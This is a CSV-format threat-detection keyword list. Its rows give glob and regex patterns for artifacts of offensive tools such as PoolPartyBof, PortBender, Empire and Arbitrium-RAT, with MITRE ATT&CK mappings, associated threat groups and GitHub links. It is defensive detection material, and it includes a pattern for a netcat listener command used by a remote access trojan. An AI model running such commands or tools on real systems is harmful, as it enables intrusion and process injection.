"*PoolPartyBof *",".{0,1000}PoolPartyBof\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","N/A","9","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55005"
"*PoolPartyBof * HTTPSLocal*",".{0,1000}PoolPartyBof\s.{0,1000}\sHTTPSLocal.{0,1000}","offensive_tool_keyword","cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","N/A","9","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55006"
"*PoolPartyBof.cna*",".{0,1000}PoolPartyBof\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","N/A","9","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55007"
"*PoolPartyBof.cna*",".{0,1000}PoolPartyBof\.cna.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55008"
"*PoolPartyBof.h*",".{0,1000}PoolPartyBof\.h.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#content","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55009"
"*PoolPartyBof.zip*",".{0,1000}PoolPartyBof\.zip.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55010"
"*PoolPartyBof_V4.x64*",".{0,1000}PoolPartyBof_V4\.x64.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55011"
"*PoolPartyBof_V4.x64*",".{0,1000}PoolPartyBof_V4\.x64.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55012"
"*PoolPartyBof_V5.x64*",".{0,1000}PoolPartyBof_V5\.x64.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55013"
"*PoolPartyBof_V6.x64*",".{0,1000}PoolPartyBof_V6\.x64.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55014"
"*PoolPartyBof_V7.x64*",".{0,1000}PoolPartyBof_V7\.x64.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55015"
"*PoolPartyBof_V8.x64*",".{0,1000}PoolPartyBof_V8\.x64.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55016"
"*PoolPartyBof-main*",".{0,1000}PoolPartyBof\-main.{0,1000}","offensive_tool_keyword","cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","N/A","9","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55017"
"*PoolParty-main.zip*",".{0,1000}PoolParty\-main\.zip.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","55018"
"*PoolParty-PoolParty.zip*",".{0,1000}PoolParty\-PoolParty\.zip.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","55019"
"*Popen(""exec $(nc -l 0.0.0.0 -p *",".{0,1000}Popen\(\""exec\s\$\(nc\s\-l\s0\.0\.0\.0\s\-p\s.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","N/A","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","55020"
"*pornhub.py*",".{0,1000}pornhub\.py.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","#linux","N/A","6","10","8656","981","2024-09-10T20:24:32Z","2020-06-25T23:03:02Z","55021"
"*port_forward_pivot.py*",".{0,1000}port_forward_pivot\.py.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","55022"
"*port_scanner_ip_obj.py*",".{0,1000}port_scanner_ip_obj\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","N/A","8","10","2098","1599","2024-10-22T13:31:06Z","2021-01-07T16:11:52Z","55023"
"*port_scanner_regex.py*",".{0,1000}port_scanner_regex\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","N/A","8","10","2098","1599","2024-10-22T13:31:06Z","2021-01-07T16:11:52Z","55024"
"*PortBender backdoor*",".{0,1000}PortBender\sbackdoor.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/praetorian-inc/PortBender","1","0","N/A","N/A","10","10","712","111","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z","55026"
"*PortBender redirect*",".{0,1000}PortBender\sredirect.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/praetorian-inc/PortBender","1","0","N/A","N/A","10","10","712","111","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z","55027"
"*PortBender.cna*",".{0,1000}PortBender\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","N/A","10","10","712","111","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z","55028"
"*PortBender.cpp*",".{0,1000}PortBender\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","N/A","10","10","712","111","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z","55029"
"*portbender.dll*",".{0,1000}portbender\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","N/A","10","10","712","111","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z","55030"
"*PortBender.exe*",".{0,1000}PortBender\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","N/A","10","10","712","111","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z","55031"
"*PortBender.h*",".{0,1000}PortBender\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","N/A","10","10","712","111","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z","55032"
"*PortBender.sln*",".{0,1000}PortBender\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","N/A","10","10","712","111","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z","55033"
"*PortBender.zip*",".{0,1000}PortBender\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY 